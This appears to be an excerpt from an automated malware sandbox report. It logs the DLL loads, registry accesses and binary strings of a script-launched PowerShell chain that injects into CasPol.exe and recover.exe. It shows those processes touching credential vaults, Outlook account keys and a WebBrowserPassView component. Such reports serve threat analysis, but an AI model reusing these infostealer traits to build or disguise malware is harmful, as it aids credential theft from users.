Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: pstorec.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: pstorec.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: moshost.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mapsbtsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mosstorage.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ztrace_maps.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ztrace_maps.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mapconfiguration.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ztrace_maps.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\recover.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts

Jump to behavior

Source:	Binary string: dnlib.DotNet.Pdb.PdbWriter+ source: powershell.exe, 00000005.00000002.1103193592.0000000009730000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000005.00000002.1081213353.000000000610A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.mdrawmethodimplrowdnlib.dotnet.pdbpdbimpltype source: powershell.exe, 00000005.00000002.1092714773.000000000780A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000005.00000002.1103193592.0000000009730000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000005.00000002.1081213353.000000000610A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000005.00000002.1092714773.000000000780A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1092678242.00000000077F0000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: `1dnlib.dotnet.emitexceptionhandlertypednlib.dotnet.pdb.managedsymbolreadercreatordnlib.dotnetmoduledefuserdnlib.dotnetgenericparamconstraintuserdnlib.dotnetparamdefdnlib.dotnet.mdrawtypedefrowdnlib.dotnet.resourcescreateresourcedatadelegatednlib.dotnetvtableflagsdnlib.dotnet.mdrawinterfaceimplrowdnlib.dotnet.writeriheapdnlib.dotnet.mdmetadataheaderdnlib.dotnet.mdrawmodulerowdnlib.dotnetimdtokenprovidermddnlib.pervadnlib.dotnet.writermodulewriteroptionsbase source: powershell.exe, 00000005.00000002.1092714773.000000000780A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000005.00000002.1103193592.0000000009730000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000005.00000002.1081213353.000000000610A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: >.CurrentSystem.Collections.IEnumerator.CurrentSystem.Collections.Generic.IEnumerator<System.Int32>.get_CurrentSystem.Collections.Generic.IEnumerator<System.Collections.Generic.KeyValuePair<System.UInt32,System.Byte[]>>.get_CurrentSystem.Collections.Generic.IEnumerator<System.Collections.Generic.KeyValuePair<System.String,System.String>>.get_CurrentSystem.Collections.Generic.IEnumerator<T>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.CustomAttribute>.get_CurrentSystem.Collections.Generic.IEnumerator<TValue>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.FieldDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MethodDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.TypeDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.EventDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.PropertyDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.ModuleRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.TypeRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MemberRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.AssemblyRef>.get_CurrentSystem.Collections.Generic.IEnumerator<System.String>.get_CurrentSystem.Collections.Generic.IEnumerator<TIn>.get_CurrentSystem.Collections.Generic.IEnumerator<Microsoft.Win32.TaskScheduler.TaskFolder>.get_CurrentSystem.Collections.Generic.IEnumerator<Microsoft.Win32.TaskScheduler.Trigger>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.CANamedArgument>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MD.IRawRow>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.AssemblyResolver. source: powershell.exe, 00000005.00000002.1103193592.0000000009730000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000005.00000002.1081213353.000000000610A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: c:\Projects\VS2005\WebBrowserPassView\Command-Line\WebBrowserPassView.pdb source: CasPol.exe, 00000008.00000002.3469653795.0000000004540000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 00000009.00000002.1150649991.0000000000400000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000005.00000002.1103193592.0000000009730000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000005.00000002.1081213353.000000000610A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000005.00000002.1103193592.0000000009730000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000005.00000002.1081213353.000000000610A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb.managedpdbexception source: powershell.exe, 00000005.00000002.1092714773.000000000780A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: `2dnlib.dotnet.pdb.dssisymunmanagedwriter2microsoft.win32.taskschedulernotsupportedpriortoexceptiondnlib.dotnetmodulerefuserdnlib.dotnet.mddotnetstreamdnlib.dotnet.writerusheapdnlib.dotnet.pdbimage_debug_directorydnlib.dotnet.writermdtable`1microsoft.win32.taskschedulermaintenancesettingsdnlib.dotnet.writercreatepdbsymbolwriterdelegatemicrosoft.win32.taskschedulertaskrightsdnlib.dotnet.writermodulewriterexceptiondnlib.dotnet.pdb.managedpdbreaderdnlib.dotnetparamattributesdnlib.dotnet.writerhotheapdnlib.dotnettypedeforrefsigdnlib.dotnettypenameparserexceptiondnlib.dotnetexportedtypeuserdnlib.dotnet.emitcilbodydnlib.dotnet.writersignaturewriterdnlib.dotnetmethodspecuserdnlib.dotnetvtablemicrosoft.win32.taskscheduler.fluentintervaltriggerbuildermicrosoft.win32.taskschedulernotv2supportedexceptiondnlib.dotnetcanamedargumentdnlib.dotnet.emitmethodutilsdnlib.dotnet.writerblobheapdnlib.dotnet.pdbpdbstateelemdnlib.dotnetresolveexceptiondnlib.dotnet.resourcesresourceelementsetdnlib.dotnetifielddnlib.dotnet.mdrawconstantrowdnlib.dotnet.resourcesuserresourcetypemicrosoft.win32.taskschedulerregistrationtriggerdnlib.dotneteventequalitycomparertaskprincipalprivilegesenumeratordnlib.dotnettypespecdnlib.dotnet.emitopcodesmicrosoft.win32.taskschedulernamevaluepairmicrosoft.win32.taskschedulertaskaccessrulednlib.dotnet.mdtablednlib.dotnetihassemanticmicrosoft.win32.taskschedulertaskprocesstokensidtypemicrosoft.win32.taskschedulertaskcollectiondnlib.dotnetpinnedsigdnlib.dotnetmanifestresourcednlib.dotnet.emitinvalidmethodexceptiondnlib.dotnet.mdrawmodulerefrow<>c<>c<>c<>c<>c<>c<>c<>c<>cdnlib.w32resourcesresourcename<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>cdnlib.dotnet.emitinstructiondnlib.dotnet.emitflowcontroldnlib.dotnetiresolverdnlib.dotnetassemblyrefdnlib.dotnet.writerhotheap20microsoft.win32.taskschedulerweeklytriggerdnlib.dotnetptrsigdnlib.dotnet.resourcesresourcetypecodemicrosoft.win32.taskscheduler.fluentsettingsbuilderdnlib.dotnet.mdrawpropertymaprowdnlib.dotnet.mdirowreader`1microsoft.win32.taskschedulertasktriggertypednlib.dotnet.mdcolumninfodnlib.dotnetnonleafsigdnlib.dotnetcallingconventionsigmicrosoft.win32.taskscheduleridlesettingsdnlib.dotnet.writeruniquechunklist`1dnlib.dotnetsigcompareroptionsdnlib.dotnetassemblydefdnlib.ioifilesectiondnlib.dotnetsignaturereadermicrosoft.win32.taskschedulerlogontriggerdnlib.dotnet.mdrawimplmaprowdnlib.dotnetimemberrefdnlib.dotnet.writerbytearraychunkdnlib.dotnetarraymarshaltypednlib.pesubsystemdnlib.dotnetassemblylinkedresourcednlib.dotnetcmodoptsigdnlib.dotnet.mdmdtablednlib.dotnetlocalsigdnlib.dotnetimemberdefdnlib.dotnetfixedarraymarshaltypemicrosoft.win32.taskschedulercomhandleractiondnlib.dotnetmoduledefmd2dnlib.dotnet.emitdynamicmethodbodyreaderdnlib.dotnetclasslayoutuserdnlib.dotnetmethodsigtokentypemicrosoft.win32.taskschedulermonthlytriggerdnlib.peipeimagednlib.dotnet.mdrawfilerowdnlib.dotnet.writerhotheap40dnlib.dotnetmodifiersigdnlib.dotnetfullnamecreatordnlib.dotnet.emitnativemethodbodydnlib.
Source:	Binary string: `5dnlib.dotnetdeclsecuritydnlib.dotnet.writermdtablewriterdnlib.dotnetparamdefuserdnlib.dotnetframeworkredirectdnlib.dotnet.mdguidstreamdnlib.dotnet.writernativemodulewriteroptionsmemorymappedionotsupportedexceptiondnlib.dotnetmemberfindermicrosoft.win32.taskschedulertaskeventwatchermicrosoft.win32.taskschedulermonthsoftheyeardnlib.dotnetgenericinstsigmicrosoft.win32.taskschedulertaskservicednlib.dotnet.pdbsymbolwritercreatordnlib.dotnetihasconstantdnlib.peimagefileheaderdnlib.dotnetmethodsemanticsattributesdnlib.dotnetfileattributesdnlib.dotnetityperesolverdnlib.dotnetimplmapuserdnlib.dotnetmdtokensystem.runtime.compilerservicesextensionattributednlib.dotnet.writerichunkdnlib.dotnetmethodattributesdnlib.dotnet.writeriwritererrordnlib.dotnet.resourcesuserresourcedatadnlib.dotnetnullresolverdnlib.dotnet.writerstringsheapdnlib.dotnet.writerpeheadersdnlib.dotnetimplmapdnlib.dotnet.pdb.dssisymunmanageddocumentwriterdnlib.dotnet.mdheaptypednlib.dotnetidnlibdefdnlib.dotnetcustomattributemicrosoft.win32.taskscheduler.fluentactionbuilderdnlib.dotnet.mdrawmemberrefrowdnlib.utilsmfunc`3dnlib.dotnet.mdrawexportedtyperowdnlib.dotnet.writermethodbodywriterbasednlib.dotnetgenericvardnlib.dotnetimemberrefparentdnlib.dotnetiownermodulednlib.dotnetpropertysigbioscharacteristicsmicrosoft.win32.taskscheduleritriggerdelaydnlib.dotnet.mdrawfieldmarshalrow source: powershell.exe, 00000005.00000002.1092714773.000000000780A000.00000004.00000800.00020000.00000000.sdmp
